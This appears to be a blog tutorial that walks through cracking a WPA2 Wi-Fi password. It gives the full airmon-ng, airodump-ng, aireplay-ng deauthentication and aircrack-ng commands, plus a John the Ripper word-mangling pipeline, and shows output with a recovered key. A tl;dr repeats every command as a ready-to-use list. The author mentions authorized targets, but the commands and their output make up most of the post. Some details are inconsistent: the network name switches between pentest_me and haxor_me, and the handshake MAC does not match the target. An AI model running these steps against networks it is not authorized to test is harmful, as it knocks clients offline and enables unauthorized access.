If you want to read up on virtual consoles, see my post linked in this sentence.
tl;dr is posted at the bottom (for those of you just wanting the commands)

Now the fun stuff:

ONE: Find your wireless interface

This will display available interfaces capable of monitoring mode

TWO: Put it into “monitoring” mode
airomon-ng start wlan0

If you get a warning about programs potentially interfering, all I can suggest is try the next step first. If the next step fails try killing the listed processes. Personally, I used Virtual Terminals 1-3 and killed everything with prejudice. You don’t have to do this, it just made me feel cool.

My monitoring interface was named wlan0mon.

THREE: Monitor to grab a BSSID and channel.
airodump-ng wlan0mon

You’ll see some output like this:

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 24:A0:55:72:22:46  -56     1154     2971    0   9  54e  WPA2 CCMP   PSK  haxor_me
 20:22:20:F2:FA:EE  -76      712       75    0   6  54e  WPA2 CCMP   PSK  prettyflyforawifi                                                                       

My home network is pentest_me, with a BSSID of 24:A0:55:72:22:46
Please make sure this is your intended and authorized target.

FOUR: Start capturing
airodump-ng -c 9 --bssid 24:A0:55:72:22:46 -w ~/wireless/haxor_me wlan0mon

Broken down: airodump-ng -c CHANNEL –bssid BSSID -w FOLDER_TO_WRITE_TO INTERFACE

You will get a screen that looks something like this:

CH  6 ][ Elapsed: 6 mins ][ 2015-11-27 00:28                                         
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 24:A0:55:72:22:46  -74 100     3154      292    0   9  54e  WPA2 CCMP   PSK  haxor_me   
BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 24:A0:55:72:22:46  88:63:D1:C4:11:D2   -1    1e- 0      0        7

This should create four files. Don’t exit this screen! This needs to keep running to grow your capture. Those files you will run aircrack-ng on, but first you need to:

FIVE: Capture an authentication handshake.
aireplay-ng –0 1 –a 24:A0:55:72:22:46 –c 88:63:D1:C4:11:D2 wlan0mon

Broken down: -0 means deauth, the number following is how many deauth packets to send to the client. I only need one handshake, so I chose one.
-a is for the routers bssid. This is the same bssid as the one you used with airodump-ng
-c is for the client bssid. You will see client bssids show up in the terminal/window that you are running your capture on.

In the capturing window, clients (or stations) show up in the bottom portion of the window. You want the MAC address from the STATION column.

Once you send the deauth (or you can wait patiently for someone to connect normally), you should hopefully see this in the top right corner of your capture window:
CH 6 ][ Elapsed: 16 mins ][ 2015-11-27 00:39 ] [ WPA Handshake: A8:24:45:C8:08:54

That WPA Handshake bit is what youre looking for. As soon as you get that you can shut down the capture and start cracking.

SIX: Get cracking!
aircrack-ng -a2 -b 24:A0:55:72:22:46 -w /usr/share/wordlists/rockyou.txt ~/wireless/haxor_me/*.cap

Broken down:
Force the attack mode, 1 or wep for WEP and 2 or wpa for WPA-PSK.
-b or –bssid
Select the target network based on the access point MAC address.
Path to a dictionary file for wpa cracking. Specify “-” to use stdin.

In the command I ran, it will run down the rockyou wordlist included in Kali, and then stop.

That’s all fun and games, but what if we want to do some word-mangling? Well that line that says ‘Specify “-” to use stdin’ looks like it might pair nicely with this tidbit from the John the Ripper man pages:

When used with a cracking mode, except for “single crack”, makes John print the words it generates to stdout instead of cracking.
While applying wordlist rules, the significant password length is assumed to be LENGTH, or unlimited by default.

To put those together:

john --wordlist=/usr/share/rockyou.txt --rules=Single --stdout | aircrack-ng -a2 -b 24:A0:55:72:22:46 -w - ~/wireless/haxor_me/*.cap

Yay haxing!

                                 Aircrack-ng 1.2 rc2

                   [00:00:00] 1600 keys tested (4345.17 k/s)

                       KEY FOUND! [ snakepit1 ]

      Master Key     : E2 CA 4E ED 27 69 4E EE 2C 50 D1 AD AE 02 9D 89 
                       4F 3A 39 38 DA 87 72 0E 7E 40 CA 5C F4 32 B7 67 

      Transient Key  : 42 A0 1F EE 85 AC 06 64 08 57 22 7D 6B 42 0B 46 
                       0C F5 FD 91 0F 8C A8 02 E7 85 8C 66 25 FF 66 77 
                       A6 E7 C7 7A 73 75 3F E0 82 45 57 FA 5F CB 37 9F 
                       E7 7C AA 47 F6 4D A2 33 75 77 A4 EA D4 9A EE 01 

      EAPOL HMAC     : A1 24 41 C2 08 22 23 A7 E2 F0 C4 1C 11 46 21 C1


airomon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 9 --bssid 24:A0:55:72:22:46 -w ~/wireless/haxor_me wlan0mon
aireplay-ng –0 1 –a 24:A0:55:72:22:46 –c 88:63:D1:C4:11:D2 wlan0mon
aircrack-ng -a2 -b 24:A0:55:72:22:46 -w /usr/share/wordlists/rockyou.txt ~/wireless/haxor_me/*.cap
john --wordlist=/usr/share/rockyou.txt --rules=Single --stdout | aircrack-ng -a2 -b 24:A0:55:72:22:46 -w - ~/wireless/haxor_me/*.cap

Cracking WPA2 Using airmon-ng, airodump-ng, aircrack-ng, and john the ripper
Tagged on:                     

Leave a Reply

Your email address will not be published.